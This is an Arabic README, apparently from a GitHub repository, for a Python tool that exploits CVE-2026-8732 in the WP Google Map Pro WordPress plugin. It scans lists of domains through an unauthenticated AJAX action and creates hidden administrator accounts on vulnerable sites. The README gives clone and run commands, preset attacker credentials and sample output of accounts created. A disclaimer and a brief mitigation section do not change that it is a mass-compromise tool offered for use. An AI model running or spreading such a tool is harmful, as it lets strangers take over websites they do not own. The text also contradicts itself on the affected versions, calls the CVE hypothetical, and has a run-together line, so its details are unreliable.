
WP Maps Pro <= 6.1.0 - تصعيد امتيازات بدون مصادقة عبر إنشاء حساب مسؤول في إجراء AJAX الخاص بـ wpgmp_temp_access_ajax
تستغل هذه الأداة ثغرة CVE-2026-8732، وهي ثغرة موجودة في إضافة WP Google Map Pro الخاصة بووردبريس. تسمح الثغرة لمهاجم غير مُصادَق بالحصول على wpmp_token صالح عبر نقطة نهاية AJAX (admin-ajax.php?action=wpgmp_temp_access_ajax). وباستخدام هذا الرمز المميز (token)، يمكن للمهاجم الوصول إلى لوحة تحكم ووردبريس وإنشاء مستخدم جديد بصلاحيات مدير.
تقوم الأداة بإجراء مسح شامل من قائمة نطاقات، وتستخرج الـ nonce والرمز المميز، وتنشئ تلقائيًا حساب مدير مخفيًا على المواقع الضعيفة. يتم حفظ النتائج في الوقت الفعلي مع كامل تفاصيل الرمز المميز.
⚠️ إخلاء مسؤولية: هذه الأداة للاستخدام التعليمي واختبار الاختراق المصرح به فقط. استخدمها فقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها. المؤلف غير مسؤول عن أي إساءة استخدام.
للمزيد من إخلاء المسؤولية، يمكنك الاطلاع على إخلاء المسؤولية في الواجهة الرئيسية لـ Jenderal92. يمكنك التحقق منه هنا !!!
admin_created.txthttp:// و https://requestsقم بتثبيت المكتبة المطلوبة:
pip install requests
🚀 التثبيت
git clone https://github.com/Jenderal92/CVE-2026-8732.git
cd CVE-2026-8732
🎯 الاستخدام
جهّز ملف قائمة الأهداف (نطاق واحد في كل سطر):
example.com
https://target-website.com
http://vulnerable-site.org
قم بتشغيل الماسح:
python2 exploit.py targets.txt
ملفات الإخراج
الملف المحتوى res.txt النطاقات الضعيفة مع الرمز المميز الكامل ورابط إعادة التوجيه (إن وجد) admin_created.txt بيانات اعتماد المدير المنشأة بنجاح (النطاق، اسم المستخدم، كلمة المرور، البريد الإلكتروني)
مثال على الإخراج
[*] Checking: https://example.com
[VULNERABLE] https://example.com -> Token found
[*] https://example.com -> Accessing redirect URL...
[+] https://example.com -> Admin created: securityaudit_1734567890 / StrongP@ssw0rd123!
⚙️ الإعدادات
عدّل المتغيرات التالية داخل السكربت:
TIMEOUT = 10 # Request timeout in seconds
JUMLAH_THREAD = 10 # Number of concurrent threads
OUTPUT_FILE = "res.txt" # File for vulnerable results
ADMIN_FILE = "admin_created.txt"
BASE_USERNAME = "securityaudit"
NEW_PASSWORD = "StrongP@ssw0rd123!"
NEW_EMAIL = "[email protected]"
🧠 كيف تعمل
🛡️ التخفيف
· حدّث WP Google Map Pro إلى أحدث إصدار مُصحح. · عطّل إجراء AJAX الخاص بـ wpgmp_temp_access_ajax عبر كود مخصص أو جدار حماية. · استخدم جدار حماية تطبيقات الويب (WAF) لحظر الطلبات الخبيثة الموجهة إلى admin-ajax.php.
⭐ إخلاء المسؤولية
يتم توفير هذه البرمجيات "كما هي" دون أي ضمان من أي نوع. يقع كامل المخاطر المتعلقة بجودة وأداء البرمجيات على عاتقك. استخدمها بمسؤولية وفقط على الأنظمة المصرح لك باختبارها.
| الحقل | القيمة |
|---|
| معرف CVE | CVE-2026-8732 (افتراضي لهذه الإضافة) |
| الإضافة المتأثرة | WP Google Map Pro (الإصدارات <= 1.5.0) |
| نوع الثغرة | تحكم وصول مكسور / تصعيد صلاحيات |
| متجه الهجوم | غير مُصادَق، عن بُعد |
| التأثير | استيلاء كامل على الموقع عبر إنشاء حساب مدير |